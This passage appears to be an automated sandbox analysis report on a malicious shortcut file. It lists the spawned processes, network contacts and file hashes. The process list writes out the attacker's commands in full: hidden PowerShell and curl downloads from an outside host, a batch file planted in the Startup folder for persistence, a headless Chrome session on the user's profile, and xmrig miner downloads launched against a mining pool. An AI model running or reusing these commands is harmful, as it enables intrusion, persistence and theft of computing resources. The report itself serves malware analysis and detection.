PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 3556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1900 wrote to memory of 4172 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\39cb1b5b48070a2e442352125d217f0d8cfd8bf36c74b37db2b4f3085a553be5.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -URI https://sealingshop.click/bat/encode/bostar1_en.txt?info=df345rs -OutFile C:/Users/Public/img.bat;powershell C:/Users/Public/img.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:/Users/Public/img.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\img.bat""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://google.com/

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden Invoke-WebRequest -URI https://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat";

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaa8de46f8,0x7ffaa8de4708,0x7ffaa8de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1

C:\Windows\system32\curl.exe

curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Windows\system32\curl.exe

curl https://sealingshop.click/py/bostar1 -o "C:\\Users\\Public\\python39\\documents.py"

C:\Users\Public\python39\python.exe

C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe

C:\Users\Public\python39\lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe --browser chrome --language-binding python --output json

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "wmic os get osarchitecture"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic os get osarchitecture

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "chromedriver --version"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "wmic datafile where name='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe' get Version /value"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic datafile where name='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe' get Version /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe

C:\Users\Admin\.cache\selenium\chromedriver\win64\123.0.6312.122\chromedriver.exe --port=52399

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-backgrounding-occluded-windows --disable-client-side-phishing-detection --disable-default-apps --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-service-autorun --password-store=basic --profile-directory=Default --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --window-position=-10000,-10000 data:,

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa79dcc40,0x7ffaa79dcc4c,0x7ffaa79dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --enable-logging --headless --log-level=0 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --enable-logging --log-level=0 --field-trial-handle=1480,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1464 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-logging --log-level=0 --use-angle=swiftshader-webgl --use-gl=angle --headless --enable-logging --log-level=0 --field-trial-handle=1748,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1744 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=2628,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2620 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2904,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2896 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --enable-automation --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,358880423168502554,7210367120317983287,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3028 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c mkdir "C:\Users\Public\PublicAlbums"

C:\Windows\system32\cmd.exe

cmd /c mkdir "C:\Users\Public\PublicAlbums"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/xmrig3.zip?inline=false -OutFile C:\Users\Public\PublicAlbums\xmrig.zip

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/xmrig3.zip?inline=false -OutFile C:\Users\Public\PublicAlbums\xmrig.zip

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\PublicAlbums\xmrig.zip -DestinationPath C:\Users\Public\PublicAlbums

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\PublicAlbums\xmrig.zip -DestinationPath C:\Users\Public\PublicAlbums

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c C:\Users\Public\PublicAlbums\config.vbs

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Public\PublicAlbums\config.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\PublicAlbums\config.vbs"

C:\Users\Public\PublicAlbums\xmrig.exe

"C:\Users\Public\PublicAlbums\xmrig.exe" -o sg-zephyr.miningocean.org:5332 -u ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV -p workerbot -a rx/0 -k --donate-level 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cmd /c mkdir "C:\Users\Public\PublicSounds"

C:\Windows\system32\cmd.exe

cmd /c mkdir "C:\Users\Public\PublicSounds"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/lolMiner.zip?inline=false -OutFile C:\Users\Public\PublicSounds\lolMiner.zip

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/kylianjacky20241/none/-/raw/main/lolMiner.zip?inline=false -OutFile C:\Users\Public\PublicSounds\lolMiner.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7824755662742423668,4207482723410370049,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3060 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 sealingshop.click udp
US 104.21.36.187:443 sealingshop.click tcp
US 8.8.8.8:53 187.36.21.104.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 104.21.36.187:443 sealingshop.click tcp
US 8.8.8.8:53 google.com udp
GB 142.250.200.46:443 google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 104.21.36.187:443 sealingshop.click tcp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.178.10:443 ogads-pa.googleapis.com tcp
GB 142.250.178.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 104.21.36.187:443 sealingshop.click tcp
US 104.21.36.187:443 sealingshop.click tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 104.21.36.187:443 sealingshop.click tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 manh-manager.site udp
US 172.67.216.47:443 manh-manager.site tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 47.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 plausible.io udp
GB 79.127.237.132:443 plausible.io tcp
US 8.8.8.8:53 googlechromelabs.github.io udp
US 185.199.111.153:443 googlechromelabs.github.io tcp
US 8.8.8.8:53 storage.googleapis.com udp
GB 142.250.200.27:443 storage.googleapis.com tcp
US 8.8.8.8:53 132.237.127.79.in-addr.arpa udp
US 8.8.8.8:53 153.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 27.200.250.142.in-addr.arpa udp
N/A 127.0.0.1:52451 tcp
N/A 127.0.0.1:52451 tcp
N/A 127.0.0.1:52451 tcp
US 8.8.8.8:53 facebook.com udp
GB 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
N/A 127.0.0.1:52399 tcp
N/A 127.0.0.1:52399 tcp
US 172.67.216.47:443 manh-manager.site tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 172.67.216.47:443 manh-manager.site tcp
US 104.21.36.187:443 sealingshop.click tcp
US 104.21.36.187:443 sealingshop.click tcp
US 8.8.8.8:53 gitlab.com udp
US 172.65.251.78:443 gitlab.com tcp
US 8.8.8.8:53 78.251.65.172.in-addr.arpa udp
US 8.8.8.8:53 sg-zephyr.miningocean.org udp
SG 51.79.157.201:5332 sg-zephyr.miningocean.org tcp
US 172.65.251.78:443 gitlab.com tcp
US 8.8.8.8:53 201.157.79.51.in-addr.arpa udp

Files

memory/4932-2-0x00007FFAB0183000-0x00007FFAB0185000-memory.dmp

memory/4932-4-0x0000022F57E40000-0x0000022F57E62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v22g1kzv.qm0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4932-13-0x00007FFAB0180000-0x00007FFAB0C41000-memory.dmp

memory/4932-14-0x00007FFAB0180000-0x00007FFAB0C41000-memory.dmp

memory/4932-15-0x00007FFAB0183000-0x00007FFAB0185000-memory.dmp

memory/4932-16-0x00007FFAB0180000-0x00007FFAB0C41000-memory.dmp

C:\Users\Public\img.bat

MD5 9b648710dbb4153748d2b9b35fc66ccf
SHA1 839a377991fc5b562afbd215ebb26bcd2c87428c
SHA256 9f19638e57ceb12958d58783c0169dfe897cf3cb711075b65fca1f9739cf1dfc
SHA512 7b4e48a2dfe5432d70eeedec5a844bba43f573eaa7c7d84c8b4ab8b3499623bfc7cc1ab17fb13f72f6149bf494e68d6ea144a001cff97d8700b49fe2478c4fd8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 61cef8e38cd95bf003f5fdd1dc37dae1
SHA1 11f2f79ecb349344c143eea9a0fed41891a3467f
SHA256 ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA512 6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

\??\pipe\LOCAL\crashpad_1900_AAMEYTLLQXCGYOGA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0a9dc42e4013fc47438e96d24beb8eff
SHA1 806ab26d7eae031a58484188a7eb1adab06457fc
SHA256 58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512 868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

memory/4932-55-0x00007FFAB0180000-0x00007FFAB0C41000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4ca33142ce782bae1b12072c3d4d0697
SHA1 580d228499d90f0124a36efe6ab8a48edcb7da1a
